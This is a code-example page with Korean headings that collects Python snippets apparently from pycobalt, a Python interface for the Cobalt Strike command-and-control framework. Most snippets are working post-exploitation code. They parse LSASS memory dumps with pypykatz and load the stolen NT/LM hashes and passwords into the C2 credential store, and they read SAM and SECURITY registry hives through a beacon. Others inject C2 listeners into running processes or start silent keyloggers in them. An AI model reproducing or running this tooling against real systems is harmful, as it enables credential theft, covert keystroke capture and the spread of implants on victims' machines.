예제 #1
0
def parse_registry(bid,
                   boffilepath,
                   system_filepath,
                   sam_filepath=None,
                   security_filepath=None,
                   software_filepath=None,
                   chunksize=10240,
                   outputs=['text']):
    engine.message('parse_registry invoked')
    engine.message('bid %s' % bid)
    engine.message('system_filepath %s' % system_filepath)
    engine.message('sam_filepath %s' % sam_filepath)
    engine.message('security_filepath %s' % security_filepath)
    engine.message('software_filepath %s' % software_filepath)
    engine.message('chunksize %s' % chunksize)

    system_file = BaconFileReader(bid,
                                  system_filepath,
                                  boffilepath,
                                  chunksize=chunksize)
    sam_file = None
    if sam_filepath is not None and len(sam_filepath) > 0:
        sam_file = BaconFileReader(bid,
                                   sam_filepath,
                                   boffilepath,
                                   chunksize=chunksize)
    security_file = None
    if security_filepath is not None and len(security_filepath) > 0:
        security_file = BaconFileReader(bid,
                                        security_filepath,
                                        boffilepath,
                                        chunksize=chunksize)
    software_file = None
    if software_filepath is not None and len(software_filepath) > 0:
        software_file = BaconFileReader(bid,
                                        software_filepath,
                                        boffilepath,
                                        chunksize=chunksize)

    starttime = datetime.datetime.utcnow()
    po = OffineRegistry.from_files(system_file,
                                   sam_path=sam_file,
                                   security_path=security_file,
                                   software_path=software_file,
                                   notfile=True)
    endtime = datetime.datetime.utcnow()
    runtime = (endtime - starttime).total_seconds()
    engine.message('TOTAL RUNTIME: %ss' % runtime)

    engine.message(str(po))

    if 'text' in outputs:
        engine.message(str(po))
        aggressor.blog(bid, str(po))

    if 'json' in outputs:
        engine.message(po.to_json())
        aggressor.blog(bid, po.to_json())
예제 #2
0
    def parsed_callback(procs):
        found = None
        for search in proc_names:
            for proc in procs:
                if search == proc['name'] and 'arch' in proc and 'user' in proc:
                    # inject it
                    aggressor.blog(
                        bid,
                        'Injecting listener {} into process {} ({} {})'.format(
                            listener, proc['name'], proc['pid'], proc['arch']))
                    aggressor.binject(bid, proc['pid'], listener, proc['arch'])
                    return

        # nothing found
        aggressor.berror(
            bid,
            "Didn't find any processes to inject listener {}".format(listener))
예제 #3
0
    def parsed_callback(procs):
        found = None
        for search in proc_names:
            for proc in procs:
                if search == proc['name'] and 'arch' in proc and 'user' in proc:
                    # inject it
                    aggressor.blog(
                        bid, 'Keylogging process {} ({} {})'.format(
                            proc['name'], proc['pid'], proc['arch']))
                    aggressor.bkeylogger(bid,
                                         proc['pid'],
                                         proc['arch'],
                                         silent=True)
                    return

        # nothing found
        aggressor.berror(bid, "Didn't find any processes to inject keylogger")
예제 #4
0
    def parsed_callback(procs):
        for proc in procs:
            if 'arch' in proc and 'user' in proc:
                # inject it
                aggressor.blog(
                    bid, 'Keylogging process {} ({} {})'.format(
                        proc['name'], proc['pid'], proc['arch']))
                aggressor.bkeylogger(bid,
                                     proc['pid'],
                                     proc['arch'],
                                     silent=True)
                return

        # nothing found
        if proc_name:
            aggressor.berror(
                "Didn't find any processes named '{}' to inject keylogger".
                format(proc_name))
        else:
            aggressor.berror("Didn't find any processes to inject keylogger")
예제 #5
0
def _(bid, *args):
    msg = ' '.join(args)
    aggressor.blog(bid, msg)
예제 #6
0
def parse_lsass(bid,
                filepath,
                boffilepath,
                chunksize,
                packages=['all'],
                outputs=['text'],
                to_delete=False,
                add_creds=True):

    engine.message('parse_lsass invoked')
    engine.message('bid %s' % bid)
    engine.message('filepath %s' % filepath)
    engine.message('chunksize %s' % chunksize)
    engine.message('packages %s' % (','.join(packages)))

    starttime = datetime.datetime.utcnow()
    bfile = BaconFileReader(bid, filepath, boffilepath, chunksize=chunksize)
    mimi = pypykatz.parse_minidump_external(bfile,
                                            chunksize=chunksize,
                                            packages=packages)
    engine.message(str(bfile))
    endtime = datetime.datetime.utcnow()
    runtime = (endtime - starttime).total_seconds()
    engine.message('TOTAL RUNTIME: %ss' % runtime)

    if 'text' in outputs:
        engine.message(str(mimi))
        aggressor.blog(bid, str(mimi))

    if 'json' in outputs:
        engine.message(mimi.to_json())
        aggressor.blog(bid, mimi.to_json())

    if 'grep' in outputs:
        engine.message(mimi.to_grep())
        aggressor.blog(bid, mimi.to_grep())

    if to_delete is True:
        engine.call('fdelete', [bid, boffilepath, filepath, 1])

    if add_creds is True:
        host = str(bid)
        for luid in mimi.logon_sessions:
            res = mimi.logon_sessions[luid].to_dict()
            for msv in res['msv_creds']:
                engine.message(repr(msv))
                if pwconv(msv['NThash']) is not None:
                    source = '[AGGROKATZ][%s][%s] LSASS dump %s' % (
                        'msv', 'NT', filepath)
                    aggressor.credential_add(str(msv['username']),
                                             pwconv(msv['NThash']),
                                             str(msv['domainname']), source,
                                             host)
                if pwconv(msv['LMHash']) is not None:
                    source = '[AGGROKATZ][%s][%s] LSASS dump %s' % (
                        'msv', 'LM', filepath)
                    aggressor.credential_add(str(msv['username']),
                                             pwconv(msv['LMHash']),
                                             str(msv['domainname']), source,
                                             host)

            for pkgt in [
                    'wdigest_creds', 'ssp_creds', 'livessp_creds',
                    'kerberos_creds', 'credman_creds', 'tspkg_creds'
            ]:
                for pkg in res[pkgt]:
                    if pwconv(pkg['password']) is not None:
                        source = '[AGGROKATZ][%s] LSASS dump %s' % (pkgt,
                                                                    filepath)
                        aggressor.credential_add(str(pkg['username']),
                                                 pwconv(pkg['password']),
                                                 str(pkg['domainname']),
                                                 source, host)
예제 #7
0
파일: test.py 프로젝트: y35uishere/pycobalt
def test_alias(bid):
    aggressor.blog(bid, 'test_alias called for beacon: {}'.format(bid))